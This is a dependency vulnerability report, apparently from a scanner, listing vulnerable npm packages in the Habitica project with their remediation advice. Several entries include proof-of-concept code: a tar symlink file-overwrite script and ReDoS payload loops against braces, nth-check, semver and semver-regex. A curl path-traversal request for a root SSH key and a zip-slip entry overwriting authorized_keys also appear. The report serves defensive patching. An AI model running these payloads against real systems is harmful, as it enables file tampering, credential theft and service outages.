Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Symlink Attack exploitable via stripAbsolutePath(), used by the Unpack class. An attacker can overwrite arbitrary files outside the intended extraction directory by including a hardlink whose linkpath uses a drive-relative path such as C:../target.txt in a malicious tar.
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.10 or higher.
References
high severity
new
- Vulnerable module: tar
- Introduced through: bcrypt@5.1.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › bcrypt@5.1.1 › @mapbox/node-pre-gyp@1.0.11 › tar@6.2.1Remediation: Upgrade to bcrypt@6.0.0.
Overview
tar is a full-featured Tar for Node.js.
Affected versions of this package are vulnerable to Symlink Attack via tar.x() extraction, which allows an attacker to overwrite arbitrary files outside the intended extraction directory with a drive-relative symlink target - like C:../../../target.txt.
PoC
const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')
const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')
fs.writeFileSync(target, 'ORIGINAL\n')
const b = Buffer.alloc(1536)
new Header({
path: 'a/b/l',
type: 'SymbolicLink',
linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)
x({ cwd, file: tarFile }).then(() => {
fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
process.stdout.write(fs.readFileSync(target, 'utf8'))
})
Details
A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.
Directory Traversal vulnerabilities can be generally divided into two types:
- Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.
st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.
If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.
curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa
Note %2e is the URL encoded version of . (dot).
- Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as
Zip-Slip.
One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.
The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:
2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys
Remediation
Upgrade tar to version 7.5.11 or higher.
References
high severity
new
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to XML Injection via the XMLSerializer() function. An attacker can manipulate the structure and integrity of generated XML documents by injecting attacker-controlled markup containing the CDATA terminator ]]> through CDATA section content, which is not properly validated or sanitized during serialization. This can result in unauthorized XML elements or attributes being inserted, potentially leading to business logic manipulation or privilege escalation in downstream consumers.
Remediation
There is no fixed version for xmldom.
References
high severity
- Vulnerable module: braces
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › braces@2.3.2Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › braces@2.3.2
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › braces@2.3.2
Overview
braces is a Bash-like brace expansion, implemented in JavaScript.
Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Remediation
Upgrade braces to version 3.0.3 or higher.
References
high severity
- Vulnerable module: markdown-it
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › markdown-it@12.3.2
Overview
markdown-it is a modern pluggable markdown parser.
Affected versions of this package are vulnerable to Infinite loop in linkify inline rule when using malformed input.
Remediation
Upgrade markdown-it to version 13.0.2 or higher.
References
high severity
- Vulnerable module: nth-check
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-svgo@7.1.0 › svgo@1.3.2 › css-select@2.1.0 › nth-check@1.0.2Remediation: Upgrade to gulp-imagemin@8.0.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when parsing crafted invalid CSS nth-checks, due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? in RE_NTH_ELEMENT with quantified overlapping adjacency.
PoC
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade nth-check to version 2.0.1 or higher.
References
high severity
- Vulnerable module: semver
- Introduced through: apidoc@0.54.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apidoc@0.54.0 › nodemon@2.0.22 › simple-update-notifier@1.1.0 › semver@7.0.0Remediation: Upgrade to apidoc@1.1.0.
Overview
semver is a semantic version parser used by npm.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
PoC
const semver = require('semver')
const lengths_2 = [2000, 4000, 8000, 16000, 32000, 64000, 128000]
console.log("n[+] Valid range - Test payloads")
for (let i = 0; i =1.2.3' + ' '.repeat(lengths_2[i]) + '<1.3.0';
const start = Date.now()
semver.validRange(value)
// semver.minVersion(value)
// semver.maxSatisfying(["1.2.3"], value)
// semver.minSatisfying(["1.2.3"], value)
// new semver.Range(value, {})
const end = Date.now();
console.log('length=%d, time=%d ms', value.length, end - start);
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade semver to version 5.7.2, 6.3.1, 7.5.2 or higher.
References
high severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a Regular expression for matching semver versions
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can occur when running the regex on untrusted user input in a server context.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade semver-regex to version 4.0.1, 3.1.3 or higher.
References
high severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a Regular expression for matching semver versions
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). semverRegex function contains a regex that allows exponential backtracking.
PoC
import semverRegex from 'semver-regex';
// The following payload would take excessive CPU cycles
var payload = '0.0.0-0' + '.-------'.repeat(100000) + '@';
semverRegex().test(payload);
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade semver-regex to version 3.1.3 or higher.
References
high severity
- Vulnerable module: trim-newlines
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › logalot@2.1.0 › squeak@1.3.0 › lpad-align@1.1.2 › meow@3.7.0 › trim-newlines@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › logalot@2.1.0 › squeak@1.3.0 › lpad-align@1.1.2 › meow@3.7.0 › trim-newlines@1.0.0
Overview
trim-newlines is a Trim newlines from the start and/or end of a string
Affected versions of this package are vulnerable to Denial of Service (DoS) via the end() method.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade trim-newlines to version 3.0.1, 4.0.1 or higher.
References
high severity
- Vulnerable module: unset-value
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
-
